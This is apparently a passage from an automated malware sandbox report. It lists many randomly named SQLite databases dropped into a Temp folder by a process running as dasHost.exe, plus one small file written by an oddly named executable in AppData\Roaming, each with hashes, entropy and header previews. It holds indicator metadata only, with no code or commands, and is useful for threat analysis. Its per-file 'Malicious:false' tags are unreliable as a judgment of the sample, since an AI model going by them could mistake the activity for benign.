                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\vbc6stWss0

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\vumziE3Tsn

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\vxGzCk5zUG

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\w9fzGZTh0F

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\wF3DmAVx0A

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):98304
                                                                        Entropy (8bit):0.08235737944063153
                                                                        Encrypted:false
                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\wVgtauLEgu

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\wY9uPTFJlc

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\wko48uzc50

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\wn1GVXuz9Q

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\xGaUIaHrES

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\xPF2GoY7hC

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\xdYYYB6IwA

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\xgw01CogtS

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\xigy53IR8V

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\yBHFK1qDN9

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\yRP9xCRfZn

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ycnzynqLg2

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ymtJQbr0s5

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\zK7e5XsmpA

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\zS7XoC3k8L

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):98304
                                                                        Entropy (8bit):0.08235737944063153
                                                                        Encrypted:false
                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\zhMi3KNACG

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\zsDZBqjji4

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\8f534d42dac2c3

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (399), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):399
                                                                        Entropy (8bit):5.838496062654911
                                                                        Encrypted:false
                                                                        SSDEEP:12:NeEBynjwChTVIQBscLbEYPAuCcCyTBfjtdKqq:NRBu5vmcLbEIFCaBfrKqq
                                                                        MD5:8C74DA3B95FB50EDC36921D56E549D7F
                                                                        SHA1:DDA7B9FE2ED31A7E61D4C09A224996DD61407742
                                                                        SHA-256:76971963CBE1FA4B192E2811254BED3E29063CA3021503F5F4D268014A26D163
                                                                        SHA-512:E9810905C706E809F5598732487007FEDF4335727565625D83CEB2EE6FA298464E5F663CB7189E998BB172372A6C36889C0CB2F480B36C6B2F5C2B9B416D4A34
                                                                        Malicious:false
